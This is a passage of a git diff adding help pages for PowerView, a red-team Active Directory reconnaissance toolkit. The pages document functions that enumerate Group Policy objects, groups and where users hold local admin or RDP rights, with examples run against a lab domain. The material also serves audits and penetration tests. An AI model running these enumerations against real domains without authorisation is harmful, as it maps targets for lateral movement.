+ +```yaml +Type: String +Parameter Sets: (All) +Aliases: Name + +Required: False +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -LDAPFilter +Specifies an LDAP query string that is used to filter Active Directory objects. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: Filter + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Properties +Specifies the properties of the output object to retrieve from the server. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchBase +The LDAP source to search through, e.g. +"LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: ADSPath + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchScope +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Subtree +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ResultPageSize +Specifies the PageSize to set for the LDAP searcher object. 
+ +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 200 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServerTimeLimit +Specifies the maximum amount of time the server spends searching. +Default of 120 seconds. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SecurityMasks +Specifies an option for examining security information of a directory object. +One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Tombstone +Switch. +Specifies that the searcher should also return deleted/tombstoned objects. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.ForeignUser + +Custom PSObject with translated user property fields. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Get-DomainGPO.md b/docs/Recon/Get-DomainGPO.md new file mode 100755 index 0000000..9d0a468 --- /dev/null +++ b/docs/Recon/Get-DomainGPO.md 
@@ -0,0 +1,354 @@ +# Get-DomainGPO + +## SYNOPSIS +Return all GPOs or specific GPO objects in AD. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainSearcher, Get-DomainComputer, Get-DomainUser, Get-DomainOU, Get-NetComputerSiteName, Get-DomainSite, Get-DomainObject, Convert-LDAPProperty + +## SYNTAX + +### None (Default) +``` +Get-DomainGPO [[-Identity] ] [-Domain ] [-LDAPFilter ] [-Properties ] + [-SearchBase ] [-Server ] [-SearchScope ] [-ResultPageSize ] + [-ServerTimeLimit ] [-SecurityMasks ] [-Tombstone] [-FindOne] [-Credential ] + [-Raw] +``` + +### ComputerIdentity +``` +Get-DomainGPO [[-Identity] ] [-ComputerIdentity ] [-Domain ] [-LDAPFilter ] + [-Properties ] [-SearchBase ] [-Server ] [-SearchScope ] + [-ResultPageSize ] [-ServerTimeLimit ] [-SecurityMasks ] [-Tombstone] [-FindOne] + [-Credential ] [-Raw] +``` + +### UserIdentity +``` +Get-DomainGPO [[-Identity] ] [-UserIdentity ] [-Domain ] [-LDAPFilter ] + [-Properties ] [-SearchBase ] [-Server ] [-SearchScope ] + [-ResultPageSize ] [-ServerTimeLimit ] [-SecurityMasks ] [-Tombstone] [-FindOne] + [-Credential ] [-Raw] +``` + +## DESCRIPTION +Builds a directory searcher object using Get-DomainSearcher, builds a custom +LDAP filter based on targeting/filter parameters, and searches for all objects +matching the criteria. +To only return specific properies, use +"-Properties samaccountname,usnchanged,...". +By default, all GPO objects for +the current domain are returned. +To enumerate all GPOs that are applied to +a particular machine, use -ComputerName X. 
+ +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-DomainGPO -Domain testlab.local +``` + +Return all GPOs for the testlab.local domain + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-DomainGPO -ComputerName windows1.testlab.local +``` + +Returns all GPOs applied windows1.testlab.local + +### -------------------------- EXAMPLE 3 -------------------------- +``` +"{F260B76D-55C8-46C5-BEF1-9016DD98E272}","Test GPO" | Get-DomainGPO +``` + +Return the GPOs with the name of "{F260B76D-55C8-46C5-BEF1-9016DD98E272}" and the display +name of "Test GPO" + +### -------------------------- EXAMPLE 4 -------------------------- +``` +Get-DomainGPO -LDAPFilter '(!primarygroupid=513)' -Properties samaccountname,lastlogon +``` + +### -------------------------- EXAMPLE 5 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainGPO -Credential $Cred + +## PARAMETERS + +### -Identity +A display name (e.g. +'Test GPO'), DistinguishedName (e.g. +'CN={F260B76D-55C8-46C5-BEF1-9016DD98E272},CN=Policies,CN=System,DC=testlab,DC=local'), +GUID (e.g. +'10ec320d-3111-4ef4-8faf-8f14f4adc789'), or GPO name (e.g. +'{F260B76D-55C8-46C5-BEF1-9016DD98E272}'). +Wildcards accepted. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: DistinguishedName, SamAccountName, Name + +Required: False +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -ComputerIdentity +Return all GPO objects applied to a given computer identity (name, dnsname, DistinguishedName, etc.). 
+ +```yaml +Type: String +Parameter Sets: ComputerIdentity +Aliases: ComputerName + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -UserIdentity +Return all GPO objects applied to a given user identity (name, SID, DistinguishedName, etc.). + +```yaml +Type: String +Parameter Sets: UserIdentity +Aliases: UserName + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Domain +Specifies the domain to use for the query, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -LDAPFilter +Specifies an LDAP query string that is used to filter Active Directory objects. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: Filter + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Properties +Specifies the properties of the output object to retrieve from the server. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchBase +The LDAP source to search through, e.g. +"LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: ADSPath + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to. 
+ +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchScope +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Subtree +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ResultPageSize +Specifies the PageSize to set for the LDAP searcher object. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 200 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServerTimeLimit +Specifies the maximum amount of time the server spends searching. +Default of 120 seconds. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SecurityMasks +Specifies an option for examining security information of a directory object. +One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Tombstone +Switch. +Specifies that the searcher should also return deleted/tombstoned objects. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -FindOne +Only return one result object. 
+ +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: ReturnOne + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Raw +Switch. +Return raw results instead of translating the fields into a custom PSObject. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.GPO + +Custom PSObject with translated GPO property fields. + +PowerView.GPO.Raw + +The raw DirectoryServices.SearchResult object, if -Raw is enabled. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Get-DomainGPOComputerLocalGroupMapping.md b/docs/Recon/Get-DomainGPOComputerLocalGroupMapping.md new file mode 100755 index 0000000..4e5015b --- /dev/null +++ b/docs/Recon/Get-DomainGPOComputerLocalGroupMapping.md 
@@ -0,0 +1,263 @@ +# Get-DomainGPOComputerLocalGroupMapping + +## SYNOPSIS +Takes a computer (or GPO) object and determines what users/groups are in the specified +local group for the machine through GPO correlation. + +Author: @harmj0y +License: BSD 3-Clause +Required Dependencies: Get-DomainComputer, Get-DomainOU, Get-NetComputerSiteName, Get-DomainSite, Get-DomainGPOLocalGroup + +## SYNTAX + +### ComputerIdentity (Default) +``` +Get-DomainGPOComputerLocalGroupMapping [-ComputerIdentity] [-LocalGroup ] [-Domain ] + [-SearchBase ] [-Server ] [-SearchScope ] [-ResultPageSize ] + [-ServerTimeLimit ] [-Tombstone] [-Credential ] +``` + +### OUIdentity +``` +Get-DomainGPOComputerLocalGroupMapping -OUIdentity [-LocalGroup ] [-Domain ] + [-SearchBase ] [-Server ] [-SearchScope ] [-ResultPageSize ] + [-ServerTimeLimit ] [-Tombstone] [-Credential ] +``` + +## DESCRIPTION +This function is the inverse of Get-DomainGPOUserLocalGroupMapping, and finds what users/groups +are in the specified local group for a target machine through GPO correlation. + +If a -ComputerIdentity is specified, retrieve the complete computer object, attempt to +determine the OU the computer is a part of. +Then resolve the computer's site name with +Get-NetComputerSiteName and retrieve all sites object Get-DomainSite. +For those results, attempt to +enumerate all linked GPOs and associated local group settings with Get-DomainGPOLocalGroup. +For +each resulting GPO group, resolve the resulting user/group name to a full AD object and +return the results. +This will return the domain objects that are members of the specified +-LocalGroup for the given computer. + +Otherwise, if -OUIdentity is supplied, the same process is executed to find linked GPOs and +localgroup specifications. 
+ +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-DomainGPOComputerLocalGroupMapping -ComputerName WINDOWS3.testlab.local +``` + +Finds users who have local admin rights over WINDOWS3 through GPO correlation. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-DomainGPOComputerLocalGroupMapping -Domain dev.testlab.local -ComputerName WINDOWS4.dev.testlab.local -LocalGroup RDP +``` + +Finds users who have RDP rights over WINDOWS4 through GPO correlation. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainGPOComputerLocalGroupMapping -Credential $Cred -ComputerIdentity SQL.testlab.local + +## PARAMETERS + +### -ComputerIdentity +A SamAccountName (e.g. +WINDOWS10$), DistinguishedName (e.g. +CN=WINDOWS10,CN=Computers,DC=testlab,DC=local), +SID (e.g. +S-1-5-21-890171859-3433809279-3366196753-1124), GUID (e.g. +4f16b6bc-7010-4cbf-b628-f3cfe20f6994), +or a dns host name (e.g. +windows10.testlab.local) for the computer to identity GPO local group mappings for. + +```yaml +Type: String +Parameter Sets: ComputerIdentity +Aliases: ComputerName, Computer, DistinguishedName, SamAccountName, Name + +Required: True +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -OUIdentity +An OU name (e.g. +TestOU), DistinguishedName (e.g. +OU=TestOU,DC=testlab,DC=local), or +GUID (e.g. +8a9ba22a-8977-47e6-84ce-8c26af4e1e6a) for the OU to identity GPO local group mappings for. + +```yaml +Type: String +Parameter Sets: OUIdentity +Aliases: OU + +Required: True +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -LocalGroup +The local group to check access against. 
+Can be "Administrators" (S-1-5-32-544), "RDP/Remote Desktop Users" (S-1-5-32-555), +or a custom local SID. +Defaults to local 'Administrators'. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Administrators +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Domain +Specifies the domain to enumerate GPOs for, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchBase +{{Fill SearchBase Description}} + +```yaml +Type: String +Parameter Sets: (All) +Aliases: ADSPath + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchScope +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Subtree +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ResultPageSize +Specifies the PageSize to set for the LDAP searcher object. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 200 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServerTimeLimit +Specifies the maximum amount of time the server spends searching. +Default of 120 seconds. 
+ +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Tombstone +Switch. +Specifies that the searcher should also return deleted/tombstoned objects. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.GGPOComputerLocalGroupMember + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Get-DomainGPOLocalGroup.md b/docs/Recon/Get-DomainGPOLocalGroup.md new file mode 100755 index 0000000..e61fb82 --- /dev/null +++ b/docs/Recon/Get-DomainGPOLocalGroup.md 
@@ -0,0 +1,259 @@ +# Get-DomainGPOLocalGroup + +## SYNOPSIS +Returns all GPOs in a domain that modify local group memberships through 'Restricted Groups' +or Group Policy preferences. +Also return their user membership mappings, if they exist. + +Author: @harmj0y +License: BSD 3-Clause +Required Dependencies: Get-DomainGPO, Get-GptTmpl, Get-GroupsXML, ConvertTo-SID, ConvertFrom-SID + +## SYNTAX + +``` +Get-DomainGPOLocalGroup [[-Identity] ] [-ResolveMembersToSIDs] [-Domain ] + [-LDAPFilter ] [-SearchBase ] [-Server ] [-SearchScope ] + [-ResultPageSize ] [-ServerTimeLimit ] [-Tombstone] [-Credential ] +``` + +## DESCRIPTION +First enumerates all GPOs in the current/target domain using Get-DomainGPO with passed +arguments, and for each GPO checks if 'Restricted Groups' are set with GptTmpl.inf or +group membership is set through Group Policy Preferences groups.xml files. +For any +GptTmpl.inf files found, the file is parsed with Get-GptTmpl and any 'Group Membership' +section data is processed if present. +Any found Groups.xml files are parsed with +Get-GroupsXML and those memberships are returned as well. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-DomainGPOLocalGroup +``` + +Returns all local groups set by GPO along with their members and memberof. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-DomainGPOLocalGroup -ResolveMembersToSIDs +``` + +Returns all local groups set by GPO along with their members and memberof, +and resolve any members to their domain SIDs. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +'{0847C615-6C4E-4D45-A064-6001040CC21C}' | Get-DomainGPOLocalGroup +``` + +Return any GPO-set groups for the GPO with the given name/GUID. + +### -------------------------- EXAMPLE 4 -------------------------- +``` +Get-DomainGPOLocalGroup 'Desktops' +``` + +Return any GPO-set groups for the GPO with the given display name. 
+ +### -------------------------- EXAMPLE 5 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainGPOLocalGroup -Credential $Cred + +## PARAMETERS + +### -Identity +A display name (e.g. +'Test GPO'), DistinguishedName (e.g. +'CN={F260B76D-55C8-46C5-BEF1-9016DD98E272},CN=Policies,CN=System,DC=testlab,DC=local'), +GUID (e.g. +'10ec320d-3111-4ef4-8faf-8f14f4adc789'), or GPO name (e.g. +'{F260B76D-55C8-46C5-BEF1-9016DD98E272}'). +Wildcards accepted. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: DistinguishedName, SamAccountName, Name + +Required: False +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -ResolveMembersToSIDs +Switch. +Indicates that any member names should be resolved to their domain SIDs. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Domain +Specifies the domain to use for the query, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -LDAPFilter +Specifies an LDAP query string that is used to filter Active Directory objects. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: Filter + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchBase +The LDAP source to search through, e.g. +"LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. 
+ +```yaml +Type: String +Parameter Sets: (All) +Aliases: ADSPath + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchScope +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Subtree +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ResultPageSize +Specifies the PageSize to set for the LDAP searcher object. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 200 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServerTimeLimit +Specifies the maximum amount of time the server spends searching. +Default of 120 seconds. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Tombstone +Switch. +Specifies that the searcher should also return deleted/tombstoned objects. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain. 
+ +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.GPOGroup + +## NOTES + +## RELATED LINKS + +[https://morgansimonsenblog.azurewebsites.net/tag/groups/](https://morgansimonsenblog.azurewebsites.net/tag/groups/) + diff --git a/docs/Recon/Get-DomainGPOUserLocalGroupMapping.md b/docs/Recon/Get-DomainGPOUserLocalGroupMapping.md new file mode 100755 index 0000000..d42a4be --- /dev/null +++ b/docs/Recon/Get-DomainGPOUserLocalGroupMapping.md 
@@ -0,0 +1,258 @@ +# Get-DomainGPOUserLocalGroupMapping + +## SYNOPSIS +Enumerates the machines where a specific domain user/group is a member of a specific +local group, all through GPO correlation. +If no user/group is specified, all +discoverable mappings are returned. + +Author: @harmj0y +License: BSD 3-Clause +Required Dependencies: Get-DomainGPOLocalGroup, Get-DomainObject, Get-DomainComputer, Get-DomainOU, Get-DomainSite, Get-DomainGroup + +## SYNTAX + +``` +Get-DomainGPOUserLocalGroupMapping [[-Identity] ] [-LocalGroup ] [-Domain ] + [-SearchBase ] [-Server ] [-SearchScope ] [-ResultPageSize ] + [-ServerTimeLimit ] [-Tombstone] [-Credential ] +``` + +## DESCRIPTION +Takes a user/group name and optional domain, and determines the computers in the domain +the user/group has local admin (or RDP) rights to. + +It does this by: + 1. +resolving the user/group to its proper SID + 2. +enumerating all groups the user/group is a current part of + and extracting all target SIDs to build a target SID list + 3. +pulling all GPOs that set 'Restricted Groups' or Groups.xml by calling + Get-DomainGPOLocalGroup + 4. +matching the target SID list to the queried GPO SID list + to enumerate all GPO the user is effectively applied with + 5. +enumerating all OUs and sites and applicable GPO GUIs are + applied to through gplink enumerating + 6. +querying for all computers under the given OUs or sites + +If no user/group is specified, all user/group -\> machine mappings discovered through +GPO relationships are returned. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Find-GPOLocation +``` + +Find all user/group -\> machine relationships where the user/group is a member +of the local administrators group on target machines. 
+ +### -------------------------- EXAMPLE 2 -------------------------- +``` +Find-GPOLocation -UserName dfm -Domain dev.testlab.local +``` + +Find all computers that dfm user has local administrator rights to in +the dev.testlab.local domain. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Find-GPOLocation -UserName dfm -Domain dev.testlab.local +``` + +Find all computers that dfm user has local administrator rights to in +the dev.testlab.local domain. + +### -------------------------- EXAMPLE 4 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainGPOUserLocalGroupMapping -Credential $Cred + +## PARAMETERS + +### -Identity +A SamAccountName (e.g. +harmj0y), DistinguishedName (e.g. +CN=harmj0y,CN=Users,DC=testlab,DC=local), +SID (e.g. +S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. +4c435dd7-dc58-4b14-9a5e-1fdb0e80d201) +for the user/group to identity GPO local group mappings for. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DistinguishedName, SamAccountName, Name + +Required: False +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -LocalGroup +The local group to check access against. +Can be "Administrators" (S-1-5-32-544), "RDP/Remote Desktop Users" (S-1-5-32-555), +or a custom local SID. +Defaults to local 'Administrators'. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Administrators +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Domain +Specifies the domain to enumerate GPOs for, defaults to the current domain. 
+ +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchBase +{{Fill SearchBase Description}} + +```yaml +Type: String +Parameter Sets: (All) +Aliases: ADSPath + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchScope +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Subtree +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ResultPageSize +Specifies the PageSize to set for the LDAP searcher object. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 200 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServerTimeLimit +Specifies the maximum amount of time the server spends searching. +Default of 120 seconds. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Tombstone +Switch. +Specifies that the searcher should also return deleted/tombstoned objects. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain. 
+ +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.GPOLocalGroupMapping + +A custom PSObject containing any target identity information and what local +group memberships they're a part of through GPO correlation. + +## NOTES + +## RELATED LINKS + +[http://www.harmj0y.net/blog/redteaming/where-my-admins-at-gpo-edition/](http://www.harmj0y.net/blog/redteaming/where-my-admins-at-gpo-edition/) + diff --git a/docs/Recon/Get-DomainGroup.md b/docs/Recon/Get-DomainGroup.md new file mode 100755 index 0000000..faaa082 --- /dev/null +++ b/docs/Recon/Get-DomainGroup.md 
@@ -0,0 +1,397 @@ +# Get-DomainGroup + +## SYNOPSIS +Return all groups or specific group objects in AD. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainSearcher, Get-DomainObject, Convert-ADName, Convert-LDAPProperty + +## SYNTAX + +``` +Get-DomainGroup [[-Identity] ] [-MemberIdentity ] [-AdminCount] [-Domain ] + [-LDAPFilter ] [-Properties ] [-SearchBase ] [-Server ] + [-SearchScope ] [-ResultPageSize ] [-ServerTimeLimit ] [-SecurityMasks ] + [-Tombstone] [-FindOne] [-Credential ] [-Raw] +``` + +## DESCRIPTION +Builds a directory searcher object using Get-DomainSearcher, builds a custom +LDAP filter based on targeting/filter parameters, and searches for all objects +matching the criteria. +To only return specific properies, use +"-Properties samaccountname,usnchanged,...". +By default, all group objects for +the current domain are returned. +To return the groups a specific user/group is +a part of, use -MemberIdentity X to execute token groups enumeration. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-DomainGroup | select samaccountname +``` + +samaccountname +-------------- +WinRMRemoteWMIUsers__ +Administrators +Users +Guests +Print Operators +Backup Operators +... 
+ +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-DomainGroup *admin* | select distinguishedname +``` + +distinguishedname +----------------- +CN=Administrators,CN=Builtin,DC=testlab,DC=local +CN=Hyper-V Administrators,CN=Builtin,DC=testlab,DC=local +CN=Schema Admins,CN=Users,DC=testlab,DC=local +CN=Enterprise Admins,CN=Users,DC=testlab,DC=local +CN=Domain Admins,CN=Users,DC=testlab,DC=local +CN=DnsAdmins,CN=Users,DC=testlab,DC=local +CN=Server Admins,CN=Users,DC=testlab,DC=local +CN=Desktop Admins,CN=Users,DC=testlab,DC=local + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Get-DomainGroup -Properties samaccountname -Identity 'S-1-5-21-890171859-3433809279-3366196753-1117' | fl +``` + +samaccountname +-------------- +Server Admins + +### -------------------------- EXAMPLE 4 -------------------------- +``` +'CN=Desktop Admins,CN=Users,DC=testlab,DC=local' | Get-DomainGroup -Server primary.testlab.local -Verbose +``` + +VERBOSE: Get-DomainSearcher search string: LDAP://DC=testlab,DC=local +VERBOSE: Get-DomainGroup filter string: (&(objectCategory=group)(|(distinguishedname=CN=DesktopAdmins,CN=Users,DC=testlab,DC=local))) + +usncreated : 13245 +grouptype : -2147483646 +samaccounttype : 268435456 +samaccountname : Desktop Admins +whenchanged : 8/10/2016 12:30:30 AM +objectsid : S-1-5-21-890171859-3433809279-3366196753-1118 +objectclass : {top, group} +cn : Desktop Admins +usnchanged : 13255 +dscorepropagationdata : 1/1/1601 12:00:00 AM +name : Desktop Admins +distinguishedname : CN=Desktop Admins,CN=Users,DC=testlab,DC=local +member : CN=Andy Robbins (admin),CN=Users,DC=testlab,DC=local +whencreated : 8/10/2016 12:29:43 AM +instancetype : 4 +objectguid : f37903ed-b333-49f4-abaa-46c65e9cca71 +objectcategory : 